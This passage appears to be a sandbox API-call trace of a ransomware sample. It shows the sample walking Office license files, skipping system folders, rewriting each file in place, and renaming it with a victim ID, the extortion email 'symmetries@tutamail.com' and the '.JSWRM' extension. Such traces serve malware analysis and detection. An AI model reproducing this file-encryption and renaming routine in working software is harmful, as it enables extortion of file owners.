lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ppd.xrm-ms", lpString2="recovery") returned 1 [0110.112] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0110.112] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0110.112] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.112] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0110.112] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ppd.xrm-ms", lpString2="msocache") returned 1 [0110.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0110.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Trial-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0110.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Trial-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0110.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0110.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0110.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Trial-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0110.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Trial-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22ce70, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0110.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0110.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0110.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0110.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0110.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.113] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20924) returned 1 [0110.113] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51b0) returned 0x24c1d0 [0110.113] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51b0, lpOverlapped=0x0) returned 1 [0110.116] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.116] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51b0, lpOverlapped=0x0) returned 1 [0110.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.118] CloseHandle (hObject=0x45c) returned 1 [0110.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0110.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0110.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0110.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0110.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0110.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0110.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.119] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0110.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0110.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0110.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.120] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb2e682d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2e682d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb463fbb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d79, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessR_Trial-ul-oob.xrm-ms", cAlternateFileName="SK2C29~1.XRM")) returned 1 [0110.120] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0110.120] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0110.120] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0110.120] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0110.120] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0110.120] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0110.120] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0110.120] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.120] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0110.120] lstrcmpiW (lpString1="SkypeforBusinessR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0110.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0110.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Trial-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0110.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Trial-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0110.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0110.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0110.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Trial-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0110.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0110.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Trial-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d298, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0110.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0110.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0110.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0110.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0110.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.121] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11641) returned 1 [0110.121] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0110.122] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0110.124] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.124] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0110.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.124] CloseHandle (hObject=0x45c) returned 1 [0110.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0110.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0110.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0110.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0110.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0110.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0110.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0110.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0110.124] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0110.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0110.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0110.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0110.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.125] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb201a07, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb201a07, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb2e682d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1aa1, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="SK41FC~1.XRM")) returned 1 [0110.125] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0110.125] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0110.125] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0110.125] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0110.126] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned 1 [0110.126] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned 1 [0110.126] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0110.126] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.126] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned -1 [0110.126] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned 1 [0110.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0110.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0110.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d0a0, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0110.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0110.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0110.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0110.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22ce70, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0110.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0110.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0110.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0110.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0110.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.127] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6817) returned 1 [0110.127] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1aa0) returned 0x205850 [0110.127] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1aa0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1aa0, lpOverlapped=0x0) returned 1 [0110.129] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.129] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1aa0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1aa0, lpOverlapped=0x0) returned 1 [0110.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0110.129] CloseHandle (hObject=0x45c) returned 1 [0110.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0110.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0110.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0110.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0110.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0110.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0110.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.129] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0110.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0110.130] HeapFree (in: 